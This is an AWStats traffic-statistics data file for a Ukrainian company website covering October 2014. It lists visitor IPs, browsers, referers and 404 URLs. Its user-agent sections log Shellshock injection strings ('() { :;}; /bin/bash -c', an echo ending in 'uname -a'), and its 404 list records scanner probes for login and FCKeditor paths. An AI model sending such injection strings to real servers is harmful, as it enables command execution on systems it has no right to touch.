AWSTATS DATA FILE 6.95 (build 1.943)
# If you remove this file, all statistics for date 201410 will be lost/reset.
# Last config file used to build this data file was /usr/local/etc/awstats/awstats.lime.com.ua.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2018                
POS_TIME 2689                
POS_VISITOR 15385               
POS_DAY 32288               
POS_DOMAIN 3544                
POS_LOGIN 4040                
POS_ROBOT 4222                
POS_WORMS 5038                
POS_EMAILSENDER 5169                
POS_EMAILRECEIVER 5312                
POS_SESSION 33141               
POS_SIDER 33349               
POS_FILETYPES 5447                
POS_OS 5626                
POS_BROWSER 5864                
POS_SCREENSIZE 7231                
POS_UNKNOWNREFERER 7305                
POS_UNKNOWNREFERERBROWSER 8394                
POS_ORIGIN 9071                
POS_SEREFERRALS 9216                
POS_PAGEREFS 9384                
POS_SEARCHWORDS 10797               
POS_KEYWORDS 10977               
POS_MISC 2353                
POS_ERRORS 11066               
POS_CLUSTER 3896                
POS_SIDER_404 11169               
POS_PLUGIN_geoip_city_maxmind 13759               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20141101002315 1 0 3821369405181
FirstTime 20141001010221
LastTime 20141031231842
LastUpdate 20141102000120 1 0 0 0 0
TotalVisits 573                 
TotalUnique 430                 
MonthHostsKnown 0                   
MonthHostsUnknown 432                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 658 667 4166951 36 49 928382
1 800 802 1202721 57 59 3045789
2 358 362 1718050 71 76 1578527
3 14 16 1516132 53 60 954942
4 5 6 13879 48 48 1532219
5 3 4 10396 37 38 1523770
6 8 9 20338 32 35 176952
7 20 26 2282003 20 24 29346
8 15 19 2271559 53 62 954533
9 34 44 6775999 45 62 1534836
10 55 76 9072250 47 68 786273
11 83 110 14341642 103 137 1571260
12 59 80 15019868 51 82 3022488
13 64 93 13564595 41 71 1518273
14 57 77 12058608 35 60 2385459
15 90 120 15837543 48 76 799054
16 66 88 11335913 49 77 1539543
17 66 81 9085509 51 68 947569
18 54 68 9061544 59 78 3037386
19 33 45 7527430 61 81 2302522
20 37 46 6775715 81 109 774106
21 29 40 6774359 62 80 2456104
22 36 49 8272151 45 67 2284975
23 18 22 3016280 37 56 806793
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 18
ua 2195 2386 110019556
unknown 129 171 24870949
us 126 147 6279767
gb 48 48 93954
ru 44 58 8292537
jp 42 42 83916
eu 24 31 5261533
de 18 19 1513920
pl 12 12 11988
cz 7 11 2255575
md 1 1 1998
cn 1 1 1998
es 3 4 751073
lv 2 3 749075
fr 5 8 27096
ro 2 3 749075
ca 1 2 8350
nl 2 3 749075
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 1
mm 0 1 6352 20141001105656
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 20
googlebot 337 33418553 20141031224154 0
yandex 179 355644 20141031175021 0
bot[\s_+:,\.\;\/\\-] 75 1634062 20141031084139 0
facebook 37 82732 20141031084915 0
no_user_agent 34 67932 20141031185939 0
mj12bot 19 37962 20141031124220 0
crawl 11 21978 20141031214610 0
exabot 10 17982 20141029164917 0
spider 4 7992 20141015005845 0
robot 4 7992 20141026173145 0
ia_archiver 1 1998 20141003120815 0
libwww 2 3996 20141018063457 0
seznambot 2 3996 20141022225156 0
mail\.ru 3 5994 20141029170623 0
slurp 2 3996 20141031212946 0
surveybot 4 7992 20141019043617 0
sogou 1 1998 20141031065950 0
baiduspider 1 0 20141008064749 0
netcraft 2 3996 20141008193537 0
nutch 1 1998 20141002155402 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 7
php 1 48 0 0
css 1 28279 0 0
html 666 1285268 0 0
js 282 1638816 0 0
jpg 5 19445 0 0
Unknown 1770 975154 0 0
swf 225 157774425 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 17
linuxsuse 1
blackberry 1
linuxandroid 22
winxp 167
winlong 39
java 1
winnt 1
linuxubuntu 3
linux 48
winvista 116
bsdfreebsd 1
macosx 115
winunknown 3
win2003 4
linuxdebian 1
Unknown 91
win2008 2336
END_OS

# Browser ID - Hits
BEGIN_BROWSER 77
msie6.0 5
chrome37.0.2062.117 5
chrome34.0.1847.137 2
firefox26.0 2
chrome5.0.375.99 1
firefox18.0 4
chrome38.0.2125.111 44
curl 3
chrome31.0.1650.63 6
chrome32.0.1707.221 3
chrome32.0.1700.99 2
msie8.0 29
msie7.0 34
chrome37.0.2062.120 3
firefox23.0 3
netscape 6
chrome33.0.1750.152 6
chrome10.0.626.0 1
chrome34.0.1847.131 28
chrome10.0.648.133 1
firefox21.0 3
firefox29.0 4
chrome14.0.803.0 1
chrome32.0.1700.107 1
chrome36.0.1985.143 9
firefox33.0 44
mozilla 26
chrome26.0.1410.64 5
chrome33.0.1750.117 3
chrome11.0.699.0 1
firefox14.0.1 2
chrome2.0.172.30 1
firefox19.0 1771
safari 8
safari7.0 28
chrome37.0.2062.124 111
firefox5.0 4
chrome11.0.672.2 1
chrome29.0.1547.57 6
chrome38.0.2125.104 269
android 7
chrome28.0.1500.95 2
chrome38.0.2125.101 34
chrome36.0.1985.125 11
firefox24.0 5
opera9.80 33
firefox31.0 9
iphone 2
chrome19.6.1070.2 1
safari8.0 23
firefox3.6.9 1
msie9.0 80
chrome37.0.2062.122 12
chrome37.0.2062.103 3
Unknown 74
firefox32.0 88
firefox3.6.7 1
chrome11.0.696.68 1
blackberry 1
iceweasel 1
chrome15.0.860.0 1
chrome27.0.1453.110 3
firefox3.6.16 4
safari6.1.5 3
chrome38.0.2125.102 8
firefox1.0.7 1
firefox1.0 1
chrome35.0.1916.153 14
firefox22.0 8
msie10.0 5
msie28.0 3
safari6.0.3 2
firefox3.6.12 1
chrome31.0.1650.16 4
chrome39.0.2171.27 3
chrome27.0.1453.116 2
chrome23.0.1271.97 12
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 17
SEOstats_2.1.0 20141026032711
visionutils/0.2 20141003135245
Mozilla/5.0_(compatible;_SiteExplorer/1.0b;__http://siteexplorer.info/) 20141031223214
HTTPClient/1.0_(2.4.0,_ruby_1.9.3_(2013-06-27)) 20141004181512
WebIndex 20141031155347
Mozilla/4.0_(compatible;_http://search.thunderstone.com/texis/websearch/about.html) 20141018122158
PycURL/7.22.0 20141006083556
()_{_:;};_/bin/bash_-c_\ 20141021202736
Mechanize/2.7.2_Ruby/2.0.0p481_(http://github.com/sparklemotion/mechanize/) 20141030091226
Mozilla 20141021165458
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141027071904
Riddler_(http://riddler.io/about.html) 20141029153840
Mozilla/5.0_(compatible;_vkShare;__http://vk.com/dev/Share) 20141028144358
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;_uname_-a 20141026122605
Mozilla/5.0_(compatible;_Prlog/1.0;__http://prlog.ru/) 20141021155916
Mozilla/5.1_(compatible;_U5/1.0;__http://uni5download.com) 20141013061734
NerdyBot 20141031172056
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 11
SEOstats_2.1.0 20141026032711
visionutils/0.2 20141003135245
HTTPClient/1.0_(2.4.0,_ruby_1.9.3_(2013-06-27)) 20141004181512
Apache-HttpClient/4.1.1_(java_1.5) 20141017031852
WebIndex 20141031155347
()_{_:;};_/bin/bash_-c_\ 20141021202736
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H; 20141027071904
Mechanize/2.7.2_Ruby/2.0.0p481_(http://github.com/sparklemotion/mechanize/) 20141030091226
Riddler_(http://riddler.io/about.html) 20141029153840
()_{_:;_};_echo_Content-type:text/plain;echo;echo;echo_M`expr_1330___7`H;_uname_-a 20141026122605
NerdyBot 20141031172056
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 2178 2186
From1 9 9
From2 55 55
From3 371 594
From4 49 106
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
google 48 48
yandex 7 7
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 34
http://www.limebtl.com 117 258
http://rabota.ua/company387684/vacancy5576992 90 90
http://limebtl.com 67 146
http://talant.ua 15 15
http://rabota.ua/company387684 12 12
http://www.talant.ua 11 11
https://www.facebook.com 6 6
http://kiev.hh.ua/employer/218914 5 5
http://hh.ua/employer/218914 5 5
http://www.maxshaman.com 5 5
http://uni5download.com 4 4
http://www.ukraine.com.ua/domains/ 1 1
http://LIMEBTL.com 1 1
http://www.talant.ua/talant-v1.swf 3 3
http://ssn-design.com.ua/kreativnyie-zavtraki/lena-revolver-pilipenko/ 1 1
http://pr-copywriting.com 1 1
http://rabotaplus.ua/out/www.limebtl.com 1 1
http://www.mami.org.ua/news/market-news/3625 2 2
http://l.facebook.com/lsr.php 1 1
http://privhosting.com 1 1
http://talant.ua/talant-v1.swf 1 1
http://l.facebook.com/l.php 2 2
https://m.facebook.com 1 1
https://limebtl.com/manager/ispmgr 0 1
http://domainsigma.com/whois/limebtl.com 4 4
http://student.rabota.ua/company387684/vacancy5576992 1 1
http://yandex.ua/clck/jsredir 3 3
http://www.limebtl.com. 1 3
http://mawords.com/limebtl.com 1 1
http://rabotaplus.ua/out/http%253A%252F%252Fwww.limebtl.com 3 3
http://maxshaman.com 2 2
http://www.imena.ua/site/check-domain 1 1
http://prlog.ru/analysis/limebtl.com 1 1
http://rabota.yandex.ua/company-info.xml 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 2
lime.com.ua 6
www.+msl.ua 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 3
lime.com.ua 6
msl.ua 1
www. 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 2
206 3 655830
404 535 146478
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 89
/cart/include/version.php 1 -
/robots.txt 359 -
/admin/FCKeditor/editor/filemanager/connectors/test.html 2 -
/buy/include/version.php 1 -
/wp-admin/admin-post.php 1 -
/user 3 -
/admin.php 16 -
/transparent/i 1 -
/he/she 1 -
/logout.php 1 -
/cgi-sys/FormMail-clone.cgi 1 -
/dialog/ 1 -
/platform/plugins/recommendations_bar/trigger 1 -
/dialog/oauth 1 -
/trackback/ 1 http://limebtl.com/
/restserver.php 1 -
/wordpress/wp-login.php 1 -
/styles/actions/users/form.css 1 -
/plugins/comments_v1.php 1 -
/index.php/admin/ 1 -
/me/apprequestformerrecipients 1 -
/g 1 -
/editor/editor/filemanager/connectors/test.html 2 -
/plugins/ 1 -
/common/widget_pipe_shell.php 1 -
/blog/wp-admin/admin-ajax.php 1 -
/fql 1 -
/FCKeditor/editor/filemanager/connectors/test.html 2 -
/.php 2 -
/occludespopups 1 -
/include/version.php 8 -
/cgi-sys/entropysearch.cgi 1 -
/application/vnd.unity 1 -
/administrator/ 10 -
/editor/editor/filemanager/browser/default/connectors/test.html 2 -
/blog/wp-login.php 1 -
/wp-login.php 27 -
/site/wp-login.php 1 -
/misc/drupal.js 1 -
/admin/Fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/common/scribe_endpoint.php 2 -
/text/javascript 1 -
/ba 1 -
/himself/herself 1 -
/apple-touch-icon.png 2 -
/plugins/plugin_pipe_shell.php 1 -
/wp-login/ 1 -
/v2.1/ 1 -
/text/css 1 -
/platform/plugins/recommendations_bar/visible 1 -
/engine/engine.php 1 -
/cgi-sys/suspendedpage.cgi 1 -
/plugins/pipe.php 1 -
/README.txt 1 -
/application/x-shockwave-flash 1 -
/his/her 1 -
/wp-admin/admin-ajax.php 1 -
/puma 2 http://limebtl.com/index.swf
/store/include/version.php 1 -
/license.txt 1 -
/downloader/index.php 1 -
/Fckeditor/editor/filemanager/browser/default/connectors/test.html 2 -
/xd/verify 1 -
/js/mage/cookies.js 1 http://limebtl.com
/me/permissions 1 -
/order/include/version.php 1 -
/wp/wp-login.php 1 -
/section/wp-login.php 1 -
/apple-touch-icon-precomposed.png 2 -
/sharer.php 1 -
/xcart/include/version.php 1 -
/btnfr 1 -
/connect/ping 1 -
/xd/reposition 1 -
/administrator/index.php 16 -
/platform/plugins/recommendations_bar/invisible 1 -
/cgi-sys/realsignup.cgi 1 -
/misc/ui/jquery.effects.blind.min.js 1 -
/document 1 -
/v1.0/ 1 -
/application/x-www-form-urlencoded 1 -
/staticresources 1 -
/impression.php/ 1 -
/platform/plugins/recommendations_bar/action 1 -
/%20%D0%90%D0%B3%D0%B5%D0%BD%D1%82%D1%81%D1%82%D0%B2%D0%BE%20%D0%91%D0%A2%D0%9B%20Lime%20(%D0%BE%D1%82%20pepsi) 4 -
/market/include/version.php 1 -
/him/her 1 -
/shop/include/version.php 1 -
/N/A 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 55
ua_kiev_13 0 1898 0 0
unknown 0 805 0 0
us_los%20angeles_ca 0 32 0 0
us_woodbridge_nj 0 31 0 0
ru_moscow_48 0 17 0 0
us_richmond_va 0 15 0 0
ua_dniepropetrovsk_04 0 11 0 0
ua_dolyna_22 0 9 0 0
ru_saint%20petersburg_66 0 9 0 0
us_mountain%20view_ca 0 7 0 0
ua_odessa_17 0 3 0 0
ua_lvov_15 0 6 0 0
nl_den%20helder_07 0 3 0 0
de_kiez_12 0 4 0 0
ua_ilya_17 0 1 0 0
cz_vrch_81 0 5 0 0
ua_mariupol_05 0 4 0 0
us_sterling_va 0 2 0 0
us_fullerton_ca 0 1 0 0
ua_simferopol_11 0 4 0 0
cn_shenzhen_30 0 1 0 0
cz_kralupy_52 0 3 0 0
us_saint%20louis_mo 0 4 0 0
us_pleasantville_ny 0 4 0 0
us_palo%20alto_ca 0 1 0 0
us_secaucus_nj 0 1 0 0
us_culver%20city_ca 0 1 0 0
gb_farnham_n7 0 4 0 0
ru_voronezh_86 0 1 0 0
ua_goncharov_06 0 6 0 0
ua_dmitriy_17 0 1 0 0
us_redmond_wa 0 1 0 0
ru_tolyatti_65 0 3 0 0
us_washington_dc 0 2 0 0
us_fort%20lauderdale_fl 0 6 0 0
fr_paris_a8 0 1 0 0
us_lakewood_oh 0 2 0 0
ua_kharkiv_07 0 6 0 0
ru_tyumen_78 0 1 0 0
ua_cherkassy_01 0 2 0 0
ua_kiselëv_03 0 1 0 0
ua_kharkov_07 0 1 0 0
es_barcelona_56 0 1 0 0
us_houston_tx 0 1 0 0
ru_luch_25 0 2 0 0
ru_samara_65 0 1 0 0
ca_laval_qc 0 2 0 0
ua_kherson_08 0 6 0 0
us_durham_nc 0 1 0 0
us_kansas%20city_mo 0 1 0 0
ua_boyarka_13 0 3 0 0
ru_istra_47 0 2 0 0
us_brooklyn_ny 0 2 0 0
ua_lutsk_24 0 3 0 0
de_leipzig_13 0 5 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 432
109.86.15.97 1770 1771 1003433 20141020022549
188.116.54.12 12 12 11988 20141029195958
119.63.193.196 8 8 15984 20141027131130
94.244.48.94 8 13 757067 20141027100950
195.24.137.38 8 11 757067 20141030150730
95.67.110.159 8 11 28688 20141026234130
89.145.108.203 7 7 13986 20141030224405
176.36.109.20 7 10 2249223 20141009131408
83.223.122.10 7 7 13986 20141020164732
192.99.149.88 7 7 13986 20141029013921
77.90.239.67 2 3 749075 20141024180250
92.60.190.102 4 5 753071 20141031142435
82.207.35.20 2 4 16700 20141016161727
95.133.6.57 1 1 1998 20141013181645
109.251.179.122 4 7 20696 20141010105320
193.254.196.59 1 2 8350 20141021214443
93.73.231.225 4 6 759423 20141029203214
176.37.187.8 2 4 10348 20141024155428
93.80.51.137 3 5 757425 20141028113050
217.69.133.169 4 4 7992 20141023053615
212.90.60.6 3 4 751073 20141003161823
77.52.66.27 2 3 749075 20141024140506
85.115.58.180 2 3 749075 20141014134414
208.80.194.127 1 2 747077 20141014151901
93.72.251.188 2 3 749075 20141026175147
62.205.151.61 6 8 1502146 20141001152322
93.74.124.173 6 9 753071 20141025115009
150.70.173.37 1 1 1998 20141003142104
93.73.39.98 2 3 749075 20141027191539
176.37.79.7 1 2 8350 20141025104406
31.129.67.163 2 3 749075 20141025030241
37.52.206.154 2 3 749075 20141024113831
95.133.34.6 1 1 1998 20141019195619
93.170.133.82 3 5 757425 20141017112951
91.197.51.106 2 3 749075 20141021204258
178.94.23.16 2 3 749075 20141026102718
148.251.54.101 1 1 740725 20141030152110
176.8.242.86 2 3 749075 20141028155651
46.174.161.159 2 3 749075 20141022181356
195.64.225.76 2 3 749075 20141024141501
54.165.123.208 1 1 1998 20141026112555
176.104.32.83 2 3 749075 20141026193218
212.90.61.34 2 3 749075 20141027112805
95.133.158.247 1 1 1998 20141016193916
185.10.104.196 1 1 1998 20141020022523
95.133.145.96 1 1 1998 20141029173119
178.95.5.160 1 1 1998 20141001153348
193.43.252.252 4 4 7992 20141013061734
146.148.85.2 1 1 1998 20141022182028
195.20.154.17 2 3 749075 20141031114157
94.244.130.56 2 3 749075 20141030093116
193.34.96.93 2 3 749075 20141020135118
95.133.4.22 1 1 1998 20141023231713
54.167.68.21 1 1 1998 20141004113411
89.252.20.188 2 3 749075 20141003091655
54.82.213.132 1 1 1998 20141004181512
198.211.96.53 1 2 8350 20141014060420
150.70.75.206 1 1 1998 20141010125935
192.240.211.206 1 2 5887 20141014170903
94.158.91.188 2 3 749075 20141007194635
130.211.154.101 1 1 1998 20141001175729
95.61.53.40 1 1 1998 20141011042137
37.52.195.233 2 3 749075 20141015123025
212.15.155.136 2 3 749075 20141017142511
38.100.21.62 1 1 1998 20141020061834
176.100.15.53 1 1 1998 20141002093325
193.238.116.75 2 3 749075 20141010160257
78.111.186.243 2 3 749075 20141020121404
95.133.148.26 1 1 1998 20141026151721
93.74.171.38 2 3 749075 20141025222540
91.124.143.142 2 3 749075 20141011193432
23.251.146.168 1 1 1998 20141024182114
146.148.91.11 1 1 1998 20141006200857
91.200.13.64 1 1 1998 20141006034257
50.112.221.60 1 1 1998 20141014101844
150.70.173.39 1 1 1998 20141015120315
54.172.85.97 1 1 1998 20141007093722
46.118.131.113 4 5 1491798 20141026230258
146.148.64.160 1 1 1998 20141030172032
176.37.87.47 2 3 749075 20141027173230
54.189.26.63 1 1 1998 20141028085823
176.38.40.24 2 3 749075 20141030161135
95.67.46.58 2 3 749075 20141027124741
217.77.221.163 2 3 749075 20141015225857
176.36.226.137 2 3 749075 20141027090813
194.169.207.7 1 2 8350 20141008175103
82.193.98.85 6 8 763419 20141024141957
80.64.80.71 4 6 753071 20141028220043
62.24.181.134 2 2 3996 20141008075509
212.90.60.132 2 3 10348 20141020182854
82.207.43.237 2 3 749075 20141027172019
94.244.43.147 2 3 749075 20141025144357
95.133.139.54 1 1 1998 20141009164834
216.172.56.37 1 1 1998 20141006203729
95.133.119.141 1 1 1998 20141006151041
194.106.218.174 2 3 749075 20141009151516
130.211.114.226 1 1 1998 20141015180119
23.23.26.238 1 1 1998 20141001024940
5.19.206.175 3 3 5994 20141011074225
65.52.246.161 1 1 1998 20141022154739
89.204.153.48 1 1 1998 20141028144242
188.186.92.198 1 1 1998 20141028070405
93.92.217.228 2 2 3996 20141024130456
146.148.87.59 1 1 1998 20141025182128
109.201.241.244 2 3 749075 20141029173911
150.70.97.88 1 1 1998 20141010105143
188.138.113.49 1 1 48 20141020204112
54.190.131.199 1 1 1998 20141011000548
91.207.6.150 1 1 1998 20141020214128
37.55.192.172 2 3 749075 20141025141105
144.76.105.151 1 1 1998 20141019113825
62.80.163.131 2 3 749075 20141016123238
209.133.77.171 3 3 5994 20141030153401
95.67.26.200 2 3 749075 20141030125217
162.244.33.8 1 1 1998 20141029223244
31.43.110.85 4 6 1498150 20141029224649
176.37.168.41 2 3 749075 20141023120902
209.133.77.165 4 4 7992 20141023175026
67.87.169.246 3 4 751073 20141008205420
134.249.174.217 2 3 749075 20141021153707
23.236.54.71 1 1 1998 20141028172046
109.95.52.189 2 3 749075 20141013152538
150.70.75.213 1 1 1998 20141010121951
178.54.63.224 2 3 749075 20141022225413
94.158.79.168 2 3 749075 20141028191522
62.210.75.104 2 4 16700 20141031074443
77.222.137.43 2 3 749075 20141027101648
95.46.216.66 2 3 749075 20141024094815
212.83.157.218 1 1 48 20141026122605
93.73.238.68 2 3 749075 20141025120915
178.150.79.66 3 6 12346 20141025162528
95.133.35.106 1 1 1998 20141031171345
94.153.242.18 1 2 8350 20141023192857
192.99.40.137 4 4 0 20141027070455
95.67.72.226 1 2 8350 20141013155939
95.133.21.138 4 6 1498150 20141015170854
146.148.94.126 1 1 1998 20141008200557
176.37.145.25 1 2 8350 20141028144305
82.144.203.88 2 3 749075 20141027152558
195.128.16.86 5 7 761421 20141014163520
109.162.27.219 6 8 1502146 20141017144937
178.95.73.128 1 1 1998 20141022201430
178.24.102.70 1 1 1998 20141010214859
87.240.182.172 1 1 1998 20141028144358
46.229.170.197 1 1 1998 20141016194036
195.18.30.212 2 3 749075 20141026005734
83.223.122.13 5 5 9990 20141029181322
107.178.208.133 1 1 1998 20141004204301
146.148.75.19 1 1 1998 20141003175749
94.211.207.102 2 3 749075 20141016131257
37.1.207.83 1 1 26 20141021202736
95.158.38.33 6 8 1500148 20141027114224
217.12.207.218 1 1 48 20141021015125
85.25.211.88 2 2 96 20141019160455
77.120.246.37 4 4 7992 20141030001404
95.133.39.229 1 1 1998 20141010143618
198.199.71.16 1 2 8350 20141020000645
46.229.170.193 1 1 1998 20141011091119
95.220.231.181 2 3 749075 20141007221325
95.133.4.168 1 1 1998 20141017213246
5.199.175.174 1 1 1998 20141023112634
95.133.102.203 1 1 1998 20141008165101
93.72.250.18 2 3 749075 20141010115851
134.249.93.63 2 3 749075 20141016192409
95.133.8.199 1 1 1998 20141004153034
95.133.102.26 2 3 749075 20141016090548
54.224.27.110 1 1 1998 20141028133217
91.204.114.222 2 3 749075 20141026103919
194.63.142.115 1 1 1998 20141003012103
82.193.99.138 2 3 749075 20141001010223
93.73.5.246 4 6 751073 20141027133220
46.229.167.149 2 2 3996 20141023223231
130.211.112.205 1 1 1998 20141008175949
119.63.193.132 3 3 5994 20141024121617
89.145.108.202 4 4 7992 20141028104532
178.95.78.143 2 3 749075 20141003141129
128.68.85.99 2 3 749075 20141031215631
93.74.195.238 2 3 749075 20141025141749
95.132.51.135 3 4 751073 20141023181621
54.185.214.7 1 1 1998 20141030091226
38.100.21.63 1 1 1998 20141014225358
193.107.106.43 2 2 3996 20141021165458
46.164.233.103 1 1 1998 20141015100949
150.70.97.69 1 1 1998 20141028104514
192.162.143.234 6 8 755069 20141031220834
178.94.20.202 2 3 749075 20141026225731
5.28.28.227 2 3 749075 20141013150015
92.60.190.100 2 3 749075 20141013181459
107.178.210.196 1 1 1998 20141031172056
91.200.56.21 2 3 749075 20141017175657
89.145.108.206 3 3 5994 20141021153835
130.211.168.79 1 1 1998 20141009180023
178.54.86.73 4 5 753071 20141024141834
72.8.183.242 1 1 1998 20141028084154
146.148.81.104 1 1 1998 20141026172058
87.240.182.169 1 1 1998 20141021164625
176.36.26.116 2 3 749075 20141027142332
54.172.51.166 1 1 1998 20141002224524
185.10.104.194 2 2 3996 20141028004101
192.40.57.138 1 1 48 20141009174832
146.148.91.220 1 1 1998 20141018182054
212.78.105.49 4 4 7992 20141026174747
195.211.208.37 4 6 1498150 20141029205845
173.252.113.116 0 1 3889 
193.254.216.106 2 3 749075 20141022145814
68.71.44.11 1 2 8350 20141009220437
31.43.124.185 3 4 751073 20141024130017
80.78.45.18 2 3 749075 20141023113928
213.227.194.160 3 4 751073 20141006110802
95.133.50.133 1 1 1998 20141030190755
93.175.237.203 2 3 749075 20141028165023
107.178.223.217 1 1 1998 20141014180107
93.75.67.160 2 3 749075 20141026192733
91.219.254.67 2 3 749075 20141027122115
178.20.229.68 1 1 48 20141027071904
66.249.81.13 2 3 10348 20141024141241
85.142.20.210 3 3 5994 20141005100948
69.30.241.18 1 1 1998 20141022231935
176.116.192.252 2 3 749075 20141027094346
217.113.127.19 2 3 749075 20141010150937
176.102.38.145 1 1 1998 20141023142419
212.90.60.29 4 6 1498150 20141030120143
176.36.235.56 2 3 749075 20141024162659
176.37.50.48 2 3 749075 20141025180626
54.184.10.58 1 1 1998 20141018095817
77.93.42.22 2 3 749075 20141022184508
130.211.121.198 1 1 1998 20141029172146
77.239.177.190 4 6 1498150 20141001105657
93.72.107.184 2 3 749075 20141027085408
212.90.61.55 2 4 10348 20141027130344
178.216.8.22 2 3 749075 20141026222523
37.55.33.221 2 3 749075 20141010224438
83.223.122.12 1 1 1998 20141010104700
146.148.45.173 1 1 1998 20141017172310
81.95.189.32 2 3 749075 20141024124943
95.133.148.128 1 1 1998 20141014163150
89.145.108.205 6 6 11988 20141030152207
176.36.144.16 5 6 755069 20141028131844
193.41.45.29 2 3 749075 20141005173453
95.135.237.95 2 3 749075 20141015212956
95.143.1.62 2 3 749075 20141020131724
89.168.240.224 4 4 7992 20141009045241
46.165.223.217 1 1 1998 20141019211629
46.43.197.46 2 3 749075 20141011033052
89.163.1.128 4 6 751073 20141020133734
159.224.160.170 2 3 749075 20141024142033
176.37.190.35 2 3 749075 20141026193441
77.52.153.43 2 4 10348 20141001155324
95.67.70.242 2 3 749075 20141017152627
119.63.193.195 6 6 11988 20141029125828
95.133.50.5 1 1 1998 20141012172253
93.74.108.160 2 3 749075 20141029174616
130.211.157.234 1 1 1998 20141013175739
178.211.104.134 2 3 749075 20141027203119
89.105.244.46 2 3 749075 20141023135117
54.172.3.48 1 1 1998 20141002224824
91.190.113.149 1 1 48 20141010025942
176.241.110.251 2 3 749075 20141015145403
95.133.109.224 1 1 1998 20141002215448
95.133.139.97 1 1 1998 20141028011243
217.77.222.164 5 7 1500148 20141028140529
195.64.182.13 2 3 749075 20141030172150
150.70.75.167 1 1 1998 20141010104015
193.29.200.98 2 3 749075 20141020124710
198.55.113.30 1 2 5887 20141023115757
209.133.77.170 2 2 3996 20141030174949
46.25.240.155 2 3 749075 20141007022320
31.43.153.141 2 3 749075 20141025094050
130.211.165.17 1 1 1998 20141011175800
50.112.83.218 1 1 1998 20141008113858
178.150.69.78 6 9 753071 20141024155047
185.10.104.131 1 1 1998 20141008102929
213.111.83.241 2 3 749075 20141025102237
212.90.62.77 2 3 749075 20141024154753
46.150.92.185 1 2 8350 20141007182341
54.172.56.64 0 2 10241 
31.43.114.252 4 6 1498150 20141030162512
209.133.77.168 3 3 5994 20141023171037
91.217.10.162 1 1 1998 20141019020646
109.251.2.95 3 4 751073 20141024210033
91.209.51.90 2 3 749075 20141023160940
109.86.135.84 2 3 749075 20141018232311
91.214.18.9 2 3 749075 20141022212029
92.242.35.54 2 2 3996 20141031155347
119.63.193.194 6 6 11988 20141031171341
93.75.71.157 1 2 8350 20141021000251
93.72.68.164 2 3 749075 20141028102715
23.95.93.240 1 1 1998 20141015201710
178.151.114.122 2 3 749075 20141027112015
130.211.112.227 1 1 1998 20141023182117
162.243.170.63 1 2 8350 20141008131708
93.72.253.219 2 3 10348 20141003192359
119.63.193.131 2 2 3996 20141031231842
128.68.66.46 2 3 749075 20141029183706
217.77.222.209 2 3 749075 20141025110200
91.200.234.218 6 9 2247225 20141028144350
62.210.75.243 1 2 8350 20141030012955
93.74.106.84 2 3 749075 20141024124143
212.146.96.90 2 3 749075 20141006135406
83.223.122.11 3 3 5994 20141029175806
130.211.131.121 1 1 1998 20141019182027
